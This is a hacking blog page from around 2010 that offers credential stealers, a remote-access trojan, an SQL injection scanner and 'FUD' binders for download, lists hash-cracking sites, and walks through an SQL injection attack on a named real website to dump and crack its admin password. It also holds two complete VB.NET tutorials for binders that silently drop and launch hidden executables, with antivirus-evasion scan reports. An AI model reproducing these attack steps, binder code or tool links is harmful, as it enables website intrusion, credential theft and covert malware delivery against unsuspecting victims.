Panda - -
TrendMicro - -
VBA32 - -
VirusBuster - -

Scan report generated by
NoVirusThanks.org

NOTEPAD.EXE SPREADER
File Info

Report date: 2010-06-16 15:54:33 (GMT 1)
File name: Spread.exe
File size: 448028 bytes
MD5 Hash: 2dfadd06bbbbfc55bfbe5fd342ba730a
SHA1 Hash: 8a661d6dd0eb0be9c9cf27ab3c86f0d01f85074b
Detection rate: 1 on 17 (6%)
Status: INFECTED

Detections

a-squared - -
Avast - -
AVG - -
Avira AntiVir - DR/Delphi.Gen
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - -
NOD32 - -
Panda - -
TrendMicro - -
VBA32 - -
VirusBuster - -

Scan report generated by
NoVirusThanks.org

Code:
http://www.multiupload.com/YV890X4935


Code:
69 6e 64 65 74 65 63 74 61 62 6c 65 73 2e 6e 65 74



Read More Add your Comment 1 comments


nice List of Md5 cracker Site



http://ice.breaker.free.fr
http://www.milw0rm.com/md5/
http://shm.hard-core.pl/md5/
http://www.hashchecker.com/
http://md5.benramsey.com
http://md5.altervista.org
http://plain-text.info/add/
http://gdataonline.com/seekhash.php
http://passcrack.spb.ru
http://passcracking.ru
http://tydal.nu
http://securitystats.com
http://md5.rednoize.com
http://md5encryption.com
http://md5.thekaine.de
http://us.md5.crysm.net
http://md5-db.com
http://sha1search.com
http://md5.xpzone.de
http://csthis.com/md5
http://md5search.deerme.org
http://md5decrypter.com
http://securitydb.org/cracker
http://plain-text.info
http://hashreverse.com
http://md5crack.it-helpnet.de
http://astalavista.net
http://mmkey.com/md5
http://md5pass.info
http://md5.xek.cc
http://md5.3mt3.pl
http://hashkiller.com/index.php?action=md5webcrack
http://anqel.pl/narzedzia/md5/md5search.php


Read More Add your Comment 1 comments


Auto Hack SQL I Helper V.2.7



How to hack websites using Auto SQL I Helper V.2.7 + with imagesThis is a featured page

I have been asked lately to write a tutorial on how to use
"SQL I Helper V.2.7" tool.
At the beggining "SQLIHelperV.2.7" is a tool that will hack vulnarable websites using SQL injection. You don't have to spend hours and hours trying to find your way in a website and trying hundreds of combinations and codes to hack a website.
This tool will do it all by itself. You only have to tell her what do and where to look.
You can download it from here:
http://www.easy-share.com/1911131046/SQLIHelperV.2.7.rar

Lets start.
first you need to find the potential website that you think it might be possible to hack it. Remember that some websites are simply unhackable.
After you find your website ( better to end with "article.php?id=[number]" ) example: "http://encycl.anthropology.ru/article.php?id=1"

I will explain my tut on how to hack this website.

Check if your website can be hacked by trying to go this address :
http://encycl.anthropology.ru/article.php?id='1 <------ notice the ' before the number 1.

you should get this message:

Code:
Query failedYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'1 ORDER BY lastname' at line 1 SELECT * FROM person_old WHERE id=\'1 ORDER BY lastname

This mean that this website can be hacked because you get an error.

Now open your SQL I Helper V.2.7
and write the link :
http://encycl.anthropology.ru/article.php?id=1 <---- without the '
here
[Image: 2n8wtow.jpg]

and press the inject button.

Now you should wait until the tool finish searching for columns . Time may vary depending on your connection speed , your pc speed , and the number of columns in the website.
So now you should have this:
[Image: 15xvl2v.jpg]

then select "Get database" and you get this:
http://i40.tinypic.com/znq9tz.jpg

Now select any element from the "database name" box and press the "Get tables" button , I will select "anthropo_encycl":
[Image: 668zs6.jpg]


then select any element from the "table name" box and press the "Get columns" button , I will select "user":
[Image: 24e3vyo.jpg]

then select any elements you want from the "columns name" box and press "Dump Now" , i will select "usr_login" and "usr_pass"
[Image: 2vb4ndj.jpg]

After clicking "Dump Now" , you should see this new window
[Image: fxwj2p.jpg]

Now copy the hash on a peace of paper and go to this website:
http://www.md5crack.com/

enter the hash and press the button "Crack that hash baby!" and you should get the source of the hash.
hash:21232f297a57a5a743894a0e4a801fc3
username: admin

hash:202cb962ac59075b964b07152d234b70
pass: 123

Tooks me some time discovering the tool and preparing this tutorial and.
I am sorry for the small pics but my i have a very limited connection and cannot upload big pics
I am interested to know your comments and +rep me if you like it and think it is useful.


Read More Add your Comment 2 comments


[Release] Ref Stealer V1.2 - [91.7% Fud]



(* Screenshot *)-
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm
-(* Features *)-

What does it steals?

* Firefox
* Google Chrome
* Internet Explorer
* Dial Up
* Most of Messengers (Msn, YM, Trillian, etc)




-(* Virus scan *)-
server.exe scan
File Info

Report generated: 15.1.2010 at 3.16.20 (GMT 1)
Filename: server.exe
File size: 566586 bytes
MD5 hash: ab11a66c52143a534979980e3 bfb6cc6
SHA1 hash: BA8B02072D47D08C085B7D828 0519981F67EDBF3
Detection rate: 2 on 24
Status: INFECTED

Detections

a-squared - Riskware.PSWTool.Win32.Ne tPass!IK
Avira AntiVir - TR/ATRAPS.Gen
Avast - -
AVG - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 v3 - -
Norman - -
Panda - -
QuickHeal - -
Solo Antivirus - -
Sophos - -
TrendMicro - -
VBA32 - -
VirusBuster - -
ZonerAntivirus - -

Scan report generated by
NoVirusThanks.org

Ref_Stealer_v1.2.exe scan

Antivirus Version Last Update Result
a-squared 4.5.0.48 2010.01.15 -
AhnLab-V3 5.0.0.2 2010.01.14 -
AntiVir 7.9.1.142 2010.01.14 -
Antiy-AVL 2.0.3.7 2010.01.12 -
Authentium 5.2.0.5 2010.01.14 -
Avast 4.8.1351.0 2010.01.14 -
AVG 9.0.0.725 2010.01.14 -
BitDefender 7.2 2010.01.15 -
CAT-QuickHeal 10.00 2010.01.14 -
ClamAV 0.94.1 2010.01.15 -
Comodo 3585 2010.01.14 -
DrWeb 5.0.1.12222 2010.01.15 -
eSafe 7.0.17.0 2010.01.14 -
eTrust-Vet 35.2.7236 2010.01.14 -
F-Prot 4.5.1.85 2010.01.14 -
F-Secure 9.0.15370.0 2010.01.14 -
Fortinet 4.0.14.0 2010.01.15 -
GData 19 2010.01.15 -
Ikarus T3.1.1.80.0 2010.01.15 -
Jiangmin 13.0.900 2010.01.14 -
K7AntiVirus 7.10.946 2010.01.13 -
Kaspersky 7.0.0.125 2010.01.15 -
McAfee 5861 2010.01.14 -
McAfee+Artemis 5861 2010.01.14 -
McAfee-GW-Edition 6.8.5 2010.01.14 -
Microsoft 1.5302 2010.01.14 -
NOD32 4773 2010.01.15 -
Norman 6.04.03 2010.01.14 -
nProtect 2009.1.8.0 2010.01.14 -
Panda 10.0.2.2 2010.01.14 -
PCTools 7.0.3.5 2010.01.15 -
Prevx 3.0 2010.01.15 -
Rising 22.30.04.01 2010.01.15 -
Sophos 4.49.0 2010.01.15 -
Sunbelt 3.2.1858.2 2010.01.15 -
Symantec 20091.2.0.41 2010.01.15 -
TheHacker 6.5.0.3.151 2010.01.15 -
TrendMicro 9.120.0.1004 2010.01.14 -
VBA32 3.12.12.1 2010.01.14 -
ViRobot 2010.1.14.2136 2010.01.14 -
VirusBuster 5.0.21.0 2010.01.14 -




Code:
http://uppit.com/v/WDVKHI97


Read More Add your Comment 4 comments


DarkComet-Rat (v2.0) Final RC6



Full Name : DarkComet RAT 2.0 Release Candidate 6
Coded in : Code Gear Delphi 2010
Author : DarkCoderSc
Uploader : Dfpirate



DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm



Click For Download


Code:
The Link to Download :http://www.multiupload.com/EWNA334SBI


Read More Add your Comment 0 comments


MoHackz SQL Exploit Scanner With Clean SQL 2.7 Helper



Hackz SQL Exploit Scanner With Clean SQL 2.7 Helper


============= How to use your own custom Dorks list ====================

when you extract sql exploit scanner V3 you will see a **** file named
"MHDorks.txt"
Simply replace contecst of this list with your own, do not rename the file or it will not work
File Info

Report date: 2010-06-26 1959 (GMT 1)
File name: MoHackz_SQL_Exploit_Scanner
File size: 2504704 bytes
MD5 Hash: 9f025d66dd4b8a4e836d276d08b98574
SHA1 Hash: e2c8725e573729e4be8fbc3b496b2c1555f85cb1
Detection rate: 0 on 16 (0%)
Status: CLEAN

Detections

a-squared -
Avast -
AVG -
Avira AntiVir -
BitDefender -
ClamAV -
Comodo -
Dr.Web -
F-PROT6 -
G-Data -
Ikarus T3 -
Kaspersky -
NOD32 -
Panda -
TrendMicro -
VBA32 -

Scan report generated by
NoVirusThanks.org _________________

DownLoad:

http://www.multiupload.com/9TXTJ4O3GP
Reply With Quote


Read More Add your Comment 1 comments


[GET] 1st Mass Mailer 4.2 - Full and Working



[GET] 1st Mass Mailer 4.2 - Full and Working


[Image: fstmail.gif]

First of all; not my Tool! But hell working:D

Major Features:

* Send Personalized Emails
* Create and manage subscription-based mailing lists
* Import your Email Lists with Personal Details
* Generate individual messages while sending


1st Mass Mailer is a very fast subscription-based mass mailer with a lot of useful features. This bulk email program is intended for sending requested personalized email messages to subscription-based mailing lists of respondents. 1st Mass Mailer is used by many internet professionals and on-line store owners, to notify their customers about various events and send requested newsletters to promote their new products and services. 1st Mass Mailer lets you organize a subscription on your web site, it's easy-to-use, and easy-to-configure. The program allows quickly import a list of your subscribers into its internal database, do filter based manipulations on the list, sort and search for duplicate emails and enable or disable individual subscribers. 1st Mass Mailer allows you create and manage large subscription-based mailing lists, and generate personalized messages from predefined templates while sending. It lets you define multiple independent SMTP server connections and utilizes the latest in multithreading technology, to send emails to you as fast as it is possible. You can create separate, customized subscription-based mailling lists, with varying number of fields (Name, Address, etc.), and contain information about your subscribers. You can easily define messages and insert macro substitution patterns, to be replaced with information from the database, for each recepient, just before dispatching. You can use all the standard message formats like plain text, HTML or even create a rich content message in the Microsoft Outlook Express and export it into the program.



Virusscan

Download

Key to insert: look here


Read More Add your Comment 0 comments


DOWNLOAD LINK IS HERE NOW! [Free] {100% FUD} - CS Binder [Scantime + Runtime]



Note: If the stub get's detected, I will make it FUD again. Smile

Hello guys... Oui

Here's my binder I made in VB.net:

Screenshot:



Virusscan:

File Info

Report date: 2010-05-02 19:46:34 (GMT 1)
File name: Stub2.exe
File size: 130048 bytes
MD5 Hash: 30d6187b75aa6400b397026c92a0429e
SHA1 Hash: 5a301c092a6908acf3f8fdc637718a4a6049fa8c
Detection rate: 0 on 20 (0%)
Status: CLEAN

Detections

a-squared - -
Avast - -
AVG - -
Avira AntiVir - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 - -
Panda - -
Solo - -
TrendMicro - -
VBA32 - -
VirusBuster - -
Zoner - -

Scan report generated by
NoVirusThanks.org

Credits:

Me. Got a detected stub from somewhere and made it 100% FUD. And coded the program myself

Download: http://www.mediafire.com/?mew0rz0jbim


Read More Add your Comment 1 comments


[VB.NET] Make your own binder [TUT]



Today I decided to write a tutorial on how to make your own binder in Visual Basic 2008. It's a simple crypter just binds 2 executable files. Smile



BUILDER

Add the following forms:

2 buttons
2 textboxs

You're form should look like this:
[Image: 2qtkaox.jpg]


Okay, now double click the BUTTON 1 and type the following code:
Code:
Dim ofd As New OpenFileDialog
        ofd.Title = ""
        ofd.Filter = "*.exe | *.exe"
        ofd.Title = "File 1"
        If ofd.ShowDialog = Windows.Forms.DialogResult.OK Then TextBox1.Text = ofd.FileName
        ofd.Title = "File 2"
        If ofd.ShowDialog = Windows.Forms.DialogResult.OK Then TextBox2.Text = ofd.FileName


And then double click the BUTTON 2 and type this code:
Code:
Dim stub, File_One, File_Two, Filename1, filename2 As String
        Const FileSplit = "47150"
        FileOpen(1, TextBox1.Text, OpenMode.Binary, OpenAccess.Read, OpenShare.Default)
        File_One = Space(LOF(1))
        FileGet(1, File_One)
        FileClose(1)

        FileOpen(2, TextBox2.Text, OpenMode.Binary, OpenAccess.Read, OpenShare.Default)
        File_Two = Space(LOF(2))
        FileGet(2, File_Two)
        FileClose(2)

        FileOpen(3, Application.StartupPath & "\Stub.exe", OpenMode.Binary, OpenAccess.Read, OpenShare.Default)
        stub = Space(LOF(3))
        FileGet(3, stub)
        FileClose(3)
        Dim OutputFile As String
        Dim sfd As New SaveFileDialog
        sfd.Filter = "*.exe | *.exe"
        If sfd.ShowDialog = Windows.Forms.DialogResult.OK Then
            OutputFile = sfd.FileName
        Else : Exit Sub
        End If
        Filename1 = TextBox1.Text.Substring(TextBox1.Text.LastIndexOf("\"))
        filename2 = TextBox2.Text.Substring(TextBox2.Text.LastIndexOf("\"))
        FileOpen(3, OutputFile, OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default)
        FilePut(3, stub & FileSplit & File_One & FileSplit & File_Two & FileSplit & Filename1 & FileSplit & filename2)
        FileClose(3)
        MsgBox("Binded")

Now you're done with builder, make a new form called "Stub".


STUB

Here we don't need any forms .. just click on the form and add the following code:
Code:
On Error Resume Next
        Dim TPath As String = System.IO.Path.GetTempPath
        Const FileSplit = "47150"
        Dim file1, joesdaddy, filez() As String
        FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared)
        file1 = Space(LOF(1))
        FileGet(1, file1)
        FileClose(1)
        filez = Split(file1, FileSplit)
        FileOpen(3, TPath & filez(3), OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default)
        FilePut(3, filez(1))
        FileClose(3)
        FileOpen(5, TPath & filez(4), OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default)
        FilePut(5, filez(2))
        FileClose(5)
        System.Diagnostics.Process.Start(TPath & filez(3))
        System.Diagnostics.Process.Start(TPath & filez(4))
        Me.Close()
        End


Note: You must use the same filesplit in builder and stub otherwise it won't work. My filesplit is "47150".

Credits:
flAmingw0rm - Tutorial
Nathan72389 - Source Code.


Read More Add your Comment 0 comments


[ VB.NET How To Make Advanced Binder With Icon Changer N00b!



1 Open Visual Studio 2010/2008
2 New Project
3 Choose the name for the binder
4 Form1.vb will pop up
5 Go to toolbox and get :

1 Listbox
2 Buttons [ 1 Button Called: Add File [ 1 Button Called: Next

Now you need to make the gui in your own way...
When you finishing making the layout for your binder, Click on the button Called: Add File and Post this Source Code:


Code:
Try
    Dim openfile As New OpenFileDialog
    openfile.ShowDialog()
    openfile.Title = "Select files:"
    ListBox1.Items.Add(openfile.FileName)
  Catch ex As Exception
    MsgBox("Please Report Any bugs To me")
  End Try
Now lets double click on the Button Called: Next , And post this Source Code:

Code:
Try
    If ListBox1.Items.Count < 2 Then
    MsgBox("Please choose 2 or more files for binding")
    Else
    Form2.Show()
    Me.Hide()
    End If
  Catch ex As Exception
  MsgBox("Please Report Any bugs To me")
  End Try
Now go to: Project > Add Windows Form > Then press Add

Double Click on the form2.vb and put the import on the top Above Public Class Form2 - Imports System.IO

Example:
Code:
Imports System.IO
Public Class Form2

    Private Sub Form2_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load

    End Sub
End Class

Now go back to form2.vb and Click on ToolBox and Add:

2: TextBox
3: Button: 1 Button Called: Icon & Other button Called: Output File & The last button callled: Bind Now
1: RichTextBox1
1: ComboBox1 / With DropDownList as you wish...

When you have finished your layout, Double click on the Form2.vb and put This:
Code:
ComboBox1.SelectedIndex = 0

Example:
Code:
Private Sub Form2_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
  ComboBox1.SelectedIndex = 0
    End Sub
End Class

Now double click on the Button Called Icon and Put this Source Code:
Code:
Try
    Dim openfile As New OpenFileDialog
    openfile.Filter = "ICO files|*.ico"
    openfile.ShowDialog()
    TextBox1.Text = openfile.FileName
  Catch ex As Exception
    MsgBox("Please Report Any bugs To me!")' You can put any message here  i just decided to put that '
  End Try

Example:
Code:
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
  Try
    Dim openfile As New OpenFileDialog
    openfile.Filter = "ICO files|*.ico"
    openfile.ShowDialog()
    TextBox1.Text = openfile.FileName
  Catch ex As Exception
    MsgBox("Please Report Any bugs To me!") ' You can put any message here  i just decided to put that '

    End Sub

Now double click on Button Called Output File, and put this Source Code:
Code:
Try
    Dim savefile As New SaveFileDialog
    savefile.Filter = "exe files|*.exe"
    savefile.ShowDialog()
    TextBox2.Text = savefile.FileName
  Catch ex As Exception
    MsgBox("Please Report Any bugs To me!")' You can put any message here  i just decided to put that '
  End Try

Example:
Code:
Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
  Try
    Dim savefile As New SaveFileDialog
    savefile.Filter = "exe files|*.exe"
    savefile.ShowDialog()
    TextBox2.Text = savefile.FileName
  Catch ex As Exception
    MsgBox("Please Report Any bugs To me!")
  End Try

    End Sub
End Class
Now double Click on Button Called: Bind Now and put this Source Code:

Code:
Try
    If TextBox2.TextLength = 0 Or TextBox1.TextLength = 0 Then
    MsgBox("You need to import the icon and the file So you can proccess")
    Else
    Binder.bind()
    End If
  Catch ex As Exception
  MsgBox("Please Report Any bugs To me!")' You can put any message here  i just decided to put that '
  End Try

Example:
Code:
Private Sub Button3_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button3.Click
  Try
    If TextBox2.TextLength = 0 Or TextBox1.TextLength = 0 Then
    MsgBox("You need to import the icon and the file So you can proccess")
    Else
    Binder.bind()
    End If
  Catch ex As Exception
    MsgBox("Please Report Any bugs To me!") ' You can put any message here  i just decided to put that '
  End Try
    End Sub
End Class

Now go to Project and Add Class... And put this source code on it:
Code:
Imports System.IO
Imports System.Text
Public Class Binder
    Public Shared Sub bind()
  Try
    Dim asc As New ASCIIEncoding()
    If My.Computer.FileSystem.FileExists(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi") Then
    My.Computer.FileSystem.DeleteFile(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi")
    End If
    My.Computer.FileSystem.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi", "!define PRODUCT_NAME ""Binded File""" + vbCrLf, True, asc)
    My.Computer.FileSystem.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi", "!define PRODUCT_VERSION ""1.0""" + vbCrLf, True)
    My.Computer.FileSystem.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi", "!define PRODUCT_PUBLISHER ""IP K1LL3r""" + vbCrLf, True, asc)
    My.Computer.FileSystem.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi", "!define PRODUCT_WEB_SITE ""http://www.hackforums.net""" + vbCrLf, True, asc)
    Select Case Form2.ComboBox1.SelectedItem
    Case "zlib"
    My.Computer.FileSystem.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi", "SetCompressor zlib" + vbCrLf, True, asc)
    Case "bzip2"
    My.Computer.FileSystem.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi", "SetCompressor bzip2" + vbCrLf, True, asc)
    Case "LZMA"
    My.Computer.FileSystem.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi", "SetCompressor LZMA" + vbCrLf, True, asc)
    End Select
    My.Computer.FileSystem.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi", "OutFile " + """" + Form2.TextBox2.Text + """" + vbCrLf, True, asc)
    My.Computer.FileSystem.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi", "InstallDir ""$TEMP""" + vbCrLf, True, asc)
    My.Computer.FileSystem.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi", "Icon " + """" + Form2.TextBox1.Text + """" + vbCrLf, True, asc)
    My.Computer.FileSystem.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi", "SilentInstall silent" + vbCrLf, True, asc)
    My.Computer.FileSystem.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi", "Section ""MainSection"" SEC01" + vbCrLf, True, asc)
    My.Computer.FileSystem.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi", "SetOutPath ""$INSTDIR""" + vbCrLf, True, asc)
    My.Computer.FileSystem.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi", "SetOverwrite try" + vbCrLf, True, asc)
   For a As Integer = 0 To Form1.ListBox1.Items.Count - 1
    My.Computer.FileSystem.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi", "File " + """" + Form1.ListBox1.Items.Item(a) + """" + vbCrLf, True, asc)
    My.Computer.FileSystem.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi", "ExecShell " + """" + """$INSTDIR\" + Path.GetFileName(Form1.ListBox1.Items.Item(a).ToString) + """" + vbCrLf, True, asc)
    Next
    My.Computer.FileSystem.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi", "SectionEnd" + vbCrLf, True, asc)
    My.Computer.FileSystem.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi", "Section -Post" + vbCrLf, True, asc)
    My.Computer.FileSystem.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp & "\darkbinder.nsi", "SectionEnd" + vbCrLf, True, asc)

    Dim start_info As New ProcessStartInfo("cmd.exe")
    start_info.Arguments = "/C %temp%\makensis.exe %temp%\darkbinder.nsi"
    start_info.UseShellExecute = False
    start_info.CreateNoWindow = True
    start_info.RedirectStandardOutput = True
    start_info.RedirectStandardError = True

    ' Make the process and set its start information.
    Dim proc As New Process()
    proc.StartInfo = start_info

    ' Start the process.
    proc.Start()

    ' Attach to stdout and stderr.
    Dim std_out As StreamReader = proc.StandardOutput()
    ' Display the results.
    Form2.RichTextBox1.Text = std_out.ReadToEnd()
    ' Clean up.
    std_out.Close()
    proc.Close()
    'Shell("cmd.exe /C %temp%\makensis.exe %temp%\darkbinder.nsi > c:\log.txt", AppWinStyle.Hide)
    '  Form2.RichTextBox1.LoadFile("C:\log.txt")
  Catch ex As Exception
  MsgBox("Please Report Any bugs")
  End Try
    End Sub
End Class

This tutorial is made Because people said in the other tutorial, That i didn't Explain So This Tutorial is For N00b! ! And others!
Mine looks like this:
[Image: 35bd1cx.png]
[Image: 2zpuiwl.png]


Read More Add your Comment 0 comments


 

Members

Join Us At Facebook

Enter your email address:

Delivered by FeedBurner

© 2011 Ksecurity-team All Rights Reserved Hackguide4u Theme by Adnan Anjum Learn Hacking Online hackguide4u.blogspot.com